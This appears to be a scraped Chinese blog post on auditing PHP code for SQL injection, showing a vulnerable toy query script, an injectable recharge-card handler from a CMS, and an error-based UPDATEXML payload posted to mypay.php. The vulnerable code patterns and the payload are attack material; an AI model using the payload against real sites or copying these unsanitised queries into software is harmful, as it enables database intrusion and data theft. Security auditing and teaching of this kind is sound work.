时间:2021-07-01 10:21:17 帮助过:24人阅读
$uid=$_GET[‘id‘]; $sql="SELECT * FROM userinfo where id=$uid";$conn=mysql_connect (‘localhost‘,‘root‘,‘root‘);mysql_select_db("sql",$conn);$result=mysql_query($sql,$conn);print_r(‘当前SQL语句: ‘.$sql.‘
结果: ‘);print_r(mysql_fetch_row($result));?>
首先我们看一下代码:
$uid=$_GET[‘id‘]; //获取GET值
$sql="SELECT * FROM userinfo where id=$uid"; //执行SQL语句
$conn=mysql_connect (‘localhost‘,‘root‘,‘root‘);mysql_select_db("sql",$conn); //数据库配配置
$result=mysql_query($sql,$conn); //进行查询SQL语句
print_r(‘当前SQL语句: ‘.$sql.‘
结果: ‘);print_r(mysql_fetch_row($result)); //进行打印输出没有任何的过滤所以利用简单的SQL注入语句就可以直接查询相关需要的信息。
从截图可以看出原本的SQL语句已被注入更改,使用了UNION查询到当前用户。
if(empty($_SESSION[‘duomi_user_id‘])){showMsg("请先登录","login.php");exit();}elseif($dm==‘mypay‘){$key=$_POST[‘cardkey‘];if($key==""){showMsg("请输入充值卡号","-1");exit;}$pwd=$_POST[‘cardpwd‘];if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}$sqlt="SELECT * FROM duomi_card where ckey=‘$key‘";$sqlt="SELECT * FROM duomi_card where cpwd=‘$pwd‘";$row1 = $dsql->GetOne($sqlt);if(!is_array($row1) OR $row1[‘status‘]<>0){showMsg("充值卡信息有误","-1");exit;}else{$uname=$_SESSION[‘duomi_user_name‘];$points=$row1[‘climit‘];$dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname=‘$uname‘,status=‘1‘ WHERE ckey=‘$key‘");$dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname=‘$uname‘,status=‘1‘ WHERE cpwd=‘$pwd‘");$dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username=‘$uname‘");showMsg("恭喜!充值成功!","mypay.php");exit;}}else{
http://localhost/member/mypay.php?dm=mypayPOST:cardpwd=-1‘ AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and ‘1‘=‘1
PHP代码审计SQL注入篇
标签:normal style color apple 审计